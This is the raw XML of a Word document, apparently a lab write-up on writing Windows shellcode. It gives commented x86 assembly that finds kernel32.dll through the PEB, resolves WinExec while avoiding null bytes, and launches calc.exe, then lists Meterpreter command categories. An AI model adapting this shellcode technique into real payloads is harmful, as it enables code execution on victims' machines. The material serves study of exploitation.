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AEF5" w14:textId="0A3272BA" w:rsidR="006B70F2" w:rsidRDefault="009D618B">
      <w:r w:rsidRPr="009D618B">
        <w:t>Create a shellcode to exploit windows OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C68110D" w14:textId="23C9FA36" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="177D2BF1" wp14:editId="16DFD3B8">
            <wp:extent cx="4933950" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="null_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_by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F154" w14:textId="418B8BCC" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="F0E7D5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="252525"/>
        </w:rPr>
        <w:t>The whole assembly for the shellcode is below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCE387B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format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PE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console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15598D1E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use32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278787D9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entry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gram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start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15736268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0692E9B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start:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1C6187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</w:t>
      </w:r>
      <w:proofErr w:type="gram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Save all registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D6484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</w:p>
    <w:p w14:paraId="3BA02D5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ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AF7BF51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</w:p>
    <w:p w14:paraId="5D734B0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esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B1366F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edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22624735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ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F52938C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0DF32CCB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Establish a new stack frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A0D6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ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DB2432D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ebp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esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2AC7E5B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51C5A667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sub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esp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18h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Allocate memory on stack for local variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268DAB57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23F2EDFE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push the function name on the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0E46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xor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esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C66B63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null termination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B69D079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63h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656F801B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pushw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6578h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019276F6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456e6957h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEA651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[ebp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-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4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esp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var4 = "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WinExec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\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3576F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47215238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Find kernel32.dll base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C178B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xor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= 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C000A3C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[fs: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30h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proofErr w:type="gram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written this way to avoid null bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6895785C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0x0C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</w:p>
    <w:p w14:paraId="49375616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0x14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</w:p>
    <w:p w14:paraId="6AEE5CB6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</w:p>
    <w:p w14:paraId="5567A056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</w:p>
    <w:p w14:paraId="037EE49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0x10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holds kernel32.dll base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3613B35E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[ebp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-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8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var8 = kernel32.dll base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD5006E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027E494B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Find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WinExec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address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE60BE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3Ch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RVA of PE signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25623018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add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Address of PE signature = base address + RVA of PE signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBD5B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78h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RVA of Export Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A3CFBD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add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Address of Export Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556546D9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295BCDB9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ecx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24h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RVA of Ordinal Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EFF259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add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ecx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Address of Ordinal Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D31066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[ebp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-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0Ch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ecx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var12 = Address of Ordinal Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCEFDCC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3BEB6249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edi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20h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RVA of Name Pointer Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502668EE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add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edi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Address of Name Pointer Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C94473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[ebp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-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10h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edi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var16 = Address of Name Pointer Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C8071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36582DEB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1Ch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RVA of Address Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE6530E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add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Address of Address Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D333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[ebp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-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14h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var20 = Address of Address Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F73FF21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200F8FF3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14h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Number of exported functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1012139B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2086C8D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xor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counter = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD4E940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1C053F1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proofErr w:type="gram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.loop</w:t>
      </w:r>
      <w:proofErr w:type="gram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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10519B70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edi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[ebp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-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10h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edi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= var16 = Address of Name Pointer Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C4E1DE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[ebp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-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4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= var4 = "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WinExec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\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D19D4B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xor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ecx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ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="330367B9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24AEF0DC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cld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proofErr w:type="gram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set DF=0 =&gt; process strings from left to right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665AFAC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edi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edi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*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4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Entries in Name Pointer Table are 4 bytes long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54138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edi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= RVA Nth entry = Address of Name Table * 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737E6E25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add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edi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edi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= address of string = base address + RVA Nth entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5454798D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add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cx,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8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Length of strings to compare (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len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('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WinExec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') = 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C7F6A8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repe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cmpsb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Compare the first 8 bytes of strings in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4E5C1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and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edi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registers. ZF=1 if equal, ZF=0 if not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22303FD1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jz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start.found</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="300CFDC2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7D6FC43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inc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counter++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C7F396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cmp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check if last function is reached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8878C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jb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start.loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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if not the last -&gt; loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D4FFB1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6762107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add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esp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26h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  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</w:p>
    <w:p w14:paraId="381EF6BB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jmp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start.end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if function is not found, jump to end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC38AE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7F472F6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proofErr w:type="gram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.found</w:t>
      </w:r>
      <w:proofErr w:type="gram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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F21AC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the counter (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) now holds the position of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WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2AF9D2C1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4D171220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ecx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[ebp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-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0Ch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ecx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= var12 = Address of Ordinal Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091F3191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[ebp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-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14</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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h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proofErr w:type="gram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edx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= var20 = Address of Address Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBD3649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51D8413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ax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ecx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*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2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ax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= ordinal number = var12 + (counter * 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704BE699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[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+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F92672"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>*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4</w:t>
      </w:r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]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= RVA of function = var20 + (ordinal * 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA7E2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add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= address of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WinExec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= </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B279BA1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= kernel32.dll base address + RVA of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WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="598A3F10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27A21EE8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  <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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xor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</w:p>
    <w:p w14:paraId="118878C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null termination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8F5E76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6578652eh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0627B6B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636c6163h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C99B997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5c32336dh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70719C49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65747379h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518592D5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535c7377h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5EC807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6f646e69h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C756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575c3a43h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1E256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mov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esp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 -&gt; "C:\Windows\System32\calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474F43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25CA3FFF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lastRenderedPageBreak/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gramStart"/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10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proofErr w:type="gram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window state SW_SHOWDEFAULT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B05D4D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push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esi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"C:\Windows\System32\calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C2B5E4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call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 xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DC89C63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64242A0D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add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esp</w:t>
      </w:r>
      <w:proofErr w:type="spell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,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AE81FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>46h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clear the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6E1561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</w:p>
    <w:p w14:paraId="4C371037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proofErr w:type="gram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.end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7775EFFC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</w:p>
    <w:p w14:paraId="028486DE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pop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ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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75715E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>; restore all registers and exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3136B0EA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pop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edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A2DD8AE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pop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esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BDE4341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pop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edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48C70FB8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pop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ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17B2F078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pop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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46BFF147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pop</w:t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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D618B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C9807C9" w14:textId="77777777" w:rsidR="009D618B" w:rsidRPr="009D618B" w:rsidRDefault="009D618B" w:rsidP="009D618B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E7D5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pP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EFEFEF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D618B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans" w:cs="Courier New"/>
          <w:color w:val="A6E22E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B0881B" w14:textId="66CB28F8" w:rsidR="009D618B" w:rsidRDefault="009D618B"/>
    <w:p w14:paraId="1AEF95D3" w14:textId="4784A266" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r w:rsidRPr="009D618B">
        <w:t>Execute the shellcode on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4656EECF" w14:textId="65E5145D" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55D196A7" wp14:editId="2311FAE9">
            <wp:extent cx="5715000" cy="3209925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2" name="Picture 2" descr="test_ca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_cal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3377" w14:textId="475EB587" w:rsidR="009D618B" w:rsidRDefault="009D618B"/>
    <w:p w14:paraId="1766D5F6" w14:textId="2A3D4ADA" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r w:rsidRPr="009D618B">
        <w:t>Get a Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B96724" w14:textId="77777777" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:t xml:space="preserve">Meterpreter Commands Meterpreter consists of a large number of commands which are categorized in their respective categories, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>namely :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7941502D" w14:textId="77777777" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:t xml:space="preserve"> 1. Core Commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9F48D" w14:textId="77777777" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>STDapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> File Commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712C5E3D" w14:textId="77777777" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>STDapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Networking Commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760AF988" w14:textId="77777777" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>STDapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> File- System Commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF486CA" w14:textId="77777777" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>STDapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> User Interface Commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B69FC8" w14:textId="77777777" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>STDapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Web Cam Commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61205014" w14:textId="77777777" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Elevate Commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185A9844" w14:textId="77777777" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Password database Commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5EBF37" w14:textId="2FACEF06" w:rsidR="009D618B" w:rsidRDefault="009D618B">
      <w:r>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Time Stomp commands</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009D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8B"/>
    <w:rsid w:val="006B70F2"/>
    <w:rsid w:val="009D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8397"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2002B612-3D2E-4374-9BDF-6C42692A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1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618B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9D618B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nv">
    <w:name w:val="nv"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D618B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nl">
    <w:name w:val="nl"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D618B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D618B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c1">
    <w:name w:val="c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D618B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D618B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mh">
    <w:name w:val="mh"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D618B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D618B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mi">
    <w:name w:val="mi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009D6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 SINGH</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>NAMISH SINGH</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-27T09:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-27T09:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>